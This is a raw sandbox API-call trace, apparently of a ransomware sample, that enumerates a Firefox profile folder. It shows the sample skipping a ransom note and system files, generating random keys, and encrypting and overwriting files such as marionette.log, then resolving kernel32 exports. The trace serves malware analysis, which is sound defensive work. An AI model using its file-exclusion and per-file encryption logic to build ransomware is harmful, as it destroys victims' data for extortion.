ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac9b00a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0184.453] FindClose (in: hFindFile=0x479ab8 | out: hFindFile=0x479ab8) returned 1 [0184.453] CloseHandle (hObject=0x29c) returned 1 [0184.455] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xacb2ce60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa0108, dwReserved0=0x0, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite.KvhCz", cAlternateFileName="818200~1.KVH")) returned 1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="DECRYPT-FILES.txt") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="autorun.inf") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="boot.ini") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="desktop.ini") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="ntuser.dat") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="iconcache.db") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="bootsect.bak") returned -1 [0184.455] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="ntuser.dat.log") returned -1 [0184.456] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="thumbs.db") returned -1 [0184.456] lstrcmpiW (lpString1="818200132aebmoouht.sqlite.KvhCz", lpString2="Bootfont.bin") returned -1 [0184.456] lstrlenW (lpString="818200132aebmoouht.sqlite.KvhCz") returned 31 [0184.456] lstrcmpiW (lpString1="KvhCz", lpString2="lnk") returned -1 [0184.456] lstrcmpiW (lpString1="KvhCz", lpString2="exe") returned 1 [0184.456] lstrcmpiW (lpString1="KvhCz", lpString2="sys") returned -1 [0184.456] lstrcmpiW (lpString1="KvhCz", lpString2="dll") returned 1 [0184.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0184.456] lstrlenW (lpString="818200132aebmoouht.sqlite.KvhCz") returned 31 [0184.456] lstrcpyW (in: lpString1=0x36fd8f8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0184.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite.KvhCz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KvhCz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KvhCz" [0184.456] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KvhCz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.kvhcz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c [0184.456] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x36fd0c0 | out: lpFileSize=0x36fd0c0*=655624) returned 1 [0184.457] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x2a0 [0184.457] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0184.458] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0184.458] CloseHandle (hObject=0x2a0) returned 1 [0184.458] CloseHandle (hObject=0x29c) returned 1 [0184.458] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.458] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.458] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.458] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0184.458] FindClose (in: hFindFile=0x479a78 | out: hFindFile=0x479a78) returned 1 [0184.458] CloseHandle (hObject=0x294) returned 1 [0184.458] FindNextFileW (in: hFindFile=0x479a38, lpFindFileData=0x36fe3a4 | out: lpFindFileData=0x36fe3a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xacb52fc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacb52fc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb\\", cAlternateFileName="")) returned 0 [0184.458] FindClose (in: hFindFile=0x479a38 | out: hFindFile=0x479a38) returned 1 [0184.458] CloseHandle (hObject=0x28c) returned 1 [0184.459] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home\\", cAlternateFileName="MOZ-SA~1")) returned 0 [0184.459] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0184.459] CloseHandle (hObject=0x284) returned 1 [0184.459] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xacb79120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4108, dwReserved0=0x0, dwReserved1=0x0, cFileName="key3.db.XJe4Dr", cAlternateFileName="KEY3DB~1.XJE")) returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="DECRYPT-FILES.txt") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="autorun.inf") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="boot.ini") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="desktop.ini") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="ntuser.dat") returned -1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="iconcache.db") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="bootsect.bak") returned 1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="ntuser.dat.log") returned -1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="thumbs.db") returned -1 [0184.459] lstrcmpiW (lpString1="key3.db.XJe4Dr", lpString2="Bootfont.bin") returned 1 [0184.459] lstrlenW (lpString="key3.db.XJe4Dr") returned 14 [0184.459] lstrcmpiW (lpString1="XJe4Dr", lpString2="lnk") returned 1 [0184.459] lstrcmpiW (lpString1="XJe4Dr", lpString2="exe") returned 1 [0184.459] lstrcmpiW (lpString1="XJe4Dr", lpString2="sys") returned 1 [0184.459] lstrcmpiW (lpString1="XJe4Dr", lpString2="dll") returned 1 [0184.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.459] lstrlenW (lpString="key3.db.XJe4Dr") returned 14 [0184.459] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db.XJe4Dr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.XJe4Dr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.XJe4Dr" [0184.459] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.XJe4Dr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db.xje4dr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.460] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=16648) returned 1 [0184.460] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.460] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.461] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.461] CloseHandle (hObject=0x288) returned 1 [0184.461] CloseHandle (hObject=0x284) returned 1 [0184.461] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.461] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xacbc53e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x0, dwReserved1=0x0, cFileName="localstore.rdf.B0Mw", cAlternateFileName="LOCALS~1.B0M")) returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="DECRYPT-FILES.txt") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="autorun.inf") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="boot.ini") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="desktop.ini") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="ntuser.dat") returned -1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="iconcache.db") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="bootsect.bak") returned 1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="ntuser.dat.log") returned -1 [0184.461] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="thumbs.db") returned -1 [0184.462] lstrcmpiW (lpString1="localstore.rdf.B0Mw", lpString2="Bootfont.bin") returned 1 [0184.462] lstrlenW (lpString="localstore.rdf.B0Mw") returned 19 [0184.462] lstrcmpiW (lpString1="B0Mw", lpString2="lnk") returned -1 [0184.462] lstrcmpiW (lpString1="B0Mw", lpString2="exe") returned -1 [0184.462] lstrcmpiW (lpString1="B0Mw", lpString2="sys") returned -1 [0184.462] lstrcmpiW (lpString1="B0Mw", lpString2="dll") returned -1 [0184.462] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.462] lstrlenW (lpString="localstore.rdf.B0Mw") returned 19 [0184.462] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.462] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf.B0Mw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.B0Mw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.B0Mw" [0184.462] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf.B0Mw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\localstore.rdf.b0mw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.462] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=1545) returned 1 [0184.462] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.462] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.470] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.470] CloseHandle (hObject=0x288) returned 1 [0184.470] CloseHandle (hObject=0x284) returned 1 [0184.470] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.470] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xacbeb540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x141, dwReserved0=0x0, dwReserved1=0x0, cFileName="marionette.log.0Eej", cAlternateFileName="MARION~1.0EE")) returned 1 [0184.470] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="DECRYPT-FILES.txt") returned 1 [0184.470] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="autorun.inf") returned 1 [0184.470] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="boot.ini") returned 1 [0184.470] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="desktop.ini") returned 1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="ntuser.dat") returned -1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="iconcache.db") returned 1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="bootsect.bak") returned 1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="ntuser.dat.log") returned -1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="thumbs.db") returned -1 [0184.471] lstrcmpiW (lpString1="marionette.log.0Eej", lpString2="Bootfont.bin") returned 1 [0184.471] lstrlenW (lpString="marionette.log.0Eej") returned 19 [0184.471] lstrcmpiW (lpString1="0Eej", lpString2="lnk") returned -1 [0184.471] lstrcmpiW (lpString1="0Eej", lpString2="exe") returned -1 [0184.471] lstrcmpiW (lpString1="0Eej", lpString2="sys") returned -1 [0184.471] lstrcmpiW (lpString1="0Eej", lpString2="dll") returned -1 [0184.471] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.471] lstrlenW (lpString="marionette.log.0Eej") returned 19 [0184.471] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log.0Eej" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej" [0184.471] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.0eej"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.472] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=321) returned 1 [0184.472] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.472] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.472] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.472] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.472] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.473] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0184.473] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.473] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.473] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.474] CloseHandle (hObject=0x288) returned 1 [0184.474] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.474] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0184.475] CloseHandle (hObject=0x0) returned 0 [0184.475] CloseHandle (hObject=0x284) returned 1 [0184.475] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.475] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.475] GetTickCount () returned 0x11355ce [0184.475] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.476] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.476] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.476] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.476] lstrlenA (lpString="kernel32.dll") returned 12 [0184.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.476] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.476] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.476] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.476] lstrlenA (lpString="ADDATOMA") returned 8 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.476] lstrlenA (lpString="ADDATOMW") returned 8 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.476] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.476] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.476] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.477] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.477] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.477] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.477] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.477] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.477] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.477] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.477] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.477] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.477] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 